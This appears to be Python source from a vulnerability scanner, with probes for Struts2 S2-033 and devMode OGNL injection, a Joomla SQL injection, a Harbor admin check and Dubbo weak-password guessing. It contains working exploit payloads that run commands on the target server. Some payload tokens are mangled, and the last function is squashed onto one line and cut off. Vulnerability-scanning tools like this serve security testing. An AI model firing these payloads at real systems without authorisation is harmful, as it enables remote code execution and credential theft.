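def strust2_033(self, url):
    """Probe ``url`` for Struts2 S2-033 (CVE-2016-3087), OGNL injection via the REST plugin.

    Two stages are used.  Stage one posts a payload whose command is
    ``echo vulnerable`` and requires HTTP 200 plus the marker in the body.
    Stage two re-sends the payload with ``whoami`` and only records a hit
    when ``command=whoami`` is *absent* from the response, i.e. the server
    did not merely reflect our request URL back (the usual false-positive
    source for marker-based checks).

    Args:
        url: base URL of the target application; the payload path is
            joined onto it with ``urljoin``.

    Returns:
        dict: ``{'name': 'strust2_033', 'VerifyInfo': {'URL': ..., 'Payload': ...}}``
        when the target looks vulnerable, otherwise an empty dict.  Any
        exception during the probe is printed and also yields an empty dict.
        (Previously the populated dict was built and then discarded.)
    """
    from urlparse import urljoin
    result = {}
    # S2-033 PoC
    # Author: CF_HB
    # Date: 2016-06-06
    # Vulnerability ID: CVE-2016-3087 (S2-033)
    # Details: http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/
    #
    # NOTE(review): the literal "[email protected]" tokens inside both payload strings
    # look like an artefact of text extraction (they sit where the OGNL
    # "%3d@ognl..." / "%3d@org..." fragments would be); restore them from the
    # referenced write-up before relying on this check.
    s2033_poc = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=echo vulnerable"
    try:
        poc_url = urljoin(url, s2033_poc)
        s = req.session()
        # verify=False: TLS certificate validation is deliberately skipped,
        # as in the rest of this scanner; allow_redirects=False so a redirect
        # to a generic page cannot satisfy the marker check.
        res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
        print('033poc###################################')
        print(res.content)
        if res.status_code == 200 and "vulnerable" in res.content:
            # Stage two: same payload, command swapped for whoami.
            exp = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami"
            target = urljoin(url, exp)
            res = req.post(target, timeout=3, allow_redirects=False, verify=False)
            restext = res.text.encode('utf-8').strip().strip('\x00')
            print('033exp###########################')
            print(restext)
            # Reflection guard: an error page that echoes the query string
            # would contain "command=whoami"; only a non-reflecting response
            # is treated as evidence of execution.
            if 'command=whoami' not in restext:
                result['VerifyInfo'] = {}
                result['name'] = 'strust2_033'
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = poc_url
    except Exception as e:
        print(e)
    return result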
def __init__(self, url, *args, **kwargs):
    """Initialise a SockJS client rooted at ``url``.

    Builds the per-instance base path ``<url>/<server-id>/<session-id>``
    from a random integer in 0..1000 and an 8-character ``random_str``,
    opens a ``req`` session with a fixed Referer/User-Agent pair, and
    stores a millisecond timestamp used by later requests.

    Args:
        url: SockJS endpoint the client talks to; also sent as Referer.
        *args, **kwargs: forwarded unchanged to the parent constructor.
    """
    super(SockJS, self).__init__(*args, **kwargs)
    server_id = random.randint(0, 1000)
    session_id = random_str(8)
    self.base = '{}/{}/{}'.format(url, server_id, session_id)
    # daemon=True: presumably a Thread subclass — the client must not keep
    # the scanner process alive on exit.
    self.daemon = True
    http = req.session()
    http.headers = {
        'Referer': url,
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
    }
    self.session = http
    # Epoch time in milliseconds.
    self.t = int(time.time() * 1000)
def _verify(self):
    """Verify mode: confirm the account obtained via ``get_pass`` is listed as an admin.

    ``get_pass`` is given a fresh ``req`` session and yields the username to
    look for.  ``/api/users`` is then fetched on that same session and the
    result is positive when some listed user has that name and a truthy
    ``has_admin_role``.

    Returns:
        Whatever ``parse_output`` produces for ``result``; ``result`` holds
        ``VerifyInfo['URL']`` only on a positive match.
    """
    result = {}
    harbor_session = req.session()
    username = self.get_pass(harbor_session)
    url = urljoin(self.url, '/api/users')
    header = {
        "Content-Type": "application/json",
        "Accept": "application/json",
    }
    content = harbor_session.get(url, headers=header).content
    # NOTE(review): assumes the body is a JSON list of user objects carrying
    # 'username' and 'has_admin_role'; any other shape raises here.
    is_admin = any(
        item['username'] == username and item['has_admin_role']
        for item in json.loads(content)
    )
    if is_admin:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = url
    return self.parse_output(result)
def _verify(self):
    """Verify mode: error-based SQL injection in the com_users notes filter.

    After ``get_pass`` authenticates the session, ``filter[category_id]``
    is given an ``updatexml`` expression that makes MySQL raise an XPath
    error containing ``md5(<10 random digits>)``.  A 500 response whose
    body contains the digest confirms the injection.

    Returns:
        Whatever ``parse_output`` produces for ``result``; ``result`` holds
        ``VerifyInfo['URL']`` only on a positive match.
    """
    result = {}
    joomla_session = req.session()
    self.get_pass(joomla_session)
    rand_str = randomStr(10, "0123456789")
    url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes')
    sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(randstr=rand_str)
    response = joomla_session.post(url=url, headers=self.headers, data=sqli_payload)
    if response.status_code == 500:
        # Only 31 of the 32 hex chars are compared — presumably because the
        # XPath error message is length-limited and the leading 0x7e ('~')
        # marker takes one position.
        expected = hashlib.md5(rand_str).hexdigest()[0:31]
        if expected in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
    return self.parse_output(result)
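def strust2_devmode(self, url):
    """Probe ``url`` for OGNL injection through Struts2 devMode (``?debug=browser``).

    Posts a single request whose injected command is ``echo vulnerable`` and
    treats the marker appearing anywhere in the response body as a hit.

    Caveat: the literal ``vulnerable`` is also part of the request URL
    (``command=echo vulnerable``), so a page that reflects its query string
    (e.g. a verbose 404) yields a false positive.  ``strust2_033`` adds a
    second stage that rejects reflected responses; this probe does not.

    Args:
        url: base URL of the target application; the payload is joined onto
            it with ``urljoin``.

    Returns:
        dict: ``{'VerifyInfo': {'URL': ..., 'Payload': ...}}`` when the
        marker came back, otherwise an empty dict.  Exceptions during the
        probe are printed and also yield an empty dict.  (Previously the
        populated dict was built and then discarded.)
    """
    from urlparse import urljoin
    result = {}
    # devMode vulnerability
    # NOTE(review): the literal "[email protected]" token in the payload looks like
    # an artefact of text extraction (it sits where the OGNL "%3d@ognl..."
    # fragment would be); restore it from the original PoC before use.
    data_dev = '?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=echo vulnerable'
    try:
        poc_url = urljoin(url, data_dev)
        s = req.session()
        # verify=False: TLS certificate validation is deliberately skipped,
        # as in the rest of this scanner; allow_redirects=False so a redirect
        # target cannot satisfy the marker check.
        res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
        if "vulnerable" in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            # Payload is tagged with the probe name so the caller can tell
            # which Struts2 check produced it.
            result['VerifyInfo']['Payload'] = poc_url + "strust2_devmode"
    except Exception as e:
        print(e)
    return result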
def _verify(self): # 调用指纹方法 result = {} output = Output(self) import socket import telnetlib import base64 # 默认端口 web 8080 telnet 7070 但是很多dubbo自定义了端口,以下是其他比较常见的dubbo可能存在的端口 unauth_ports = { #用于探测 1、直接未授权访问 2、basic 弱口令登录 "80", "443", "8080", #default port test demo 1.1.1.1 # "8081", # "8082", # "8083", # "8084", # "8086", "8088", "8888", # "8089", # "8090", "8000", # default pwd test :http://1.1.1.1:8000/ # "9080", # "9090", # "9999", # "18080", # "28080", } default_account = { #默认账号检测 default root/root(admin) guest /guest "root", #"admin", "guest", } default_pwd = { #默认密码检测 "root", #"admin", "guest", } telnet_ports = { "7070", #default port 1.1.1.1 # "1234", # "8000", "10001", # "9999", # "19999", # "29999", # "20000", # "18080", # "28080", # "6060", # "8084", # "12345", } vul_port = [] #step 1 http 以及弱口令 for p in unauth_ports: url = '%s:%s' % (self.url, p) try: resp = req.get(str(url), timeout=1) #print resp.text if "<title>dubbo</title>" in resp.text.lower(): vul_port.append(p) elif resp.headers[ "www-authenticate"] == "Basic realm=\"dubbo\"": #print "get basic" #vul_port.append(p) #构造弱口令爆破 for user in default_account: for pwd in default_pwd: verify_str = user + ":" + pwd #print verify_str verify_str = base64.b64encode(verify_str) basic_auth = { 'Authorization': 'BASIC ' + verify_str } #print verify_str httpreq = req.session() raa = httpreq.get(url, headers=basic_auth, timeout=1) #print raa.text #print raa.status_code if 200 == raa.status_code: #print "get weak pwd" py = p + ':(' + user + '|' + pwd + ')' vul_port.append(py) except Exception, e: #print e pass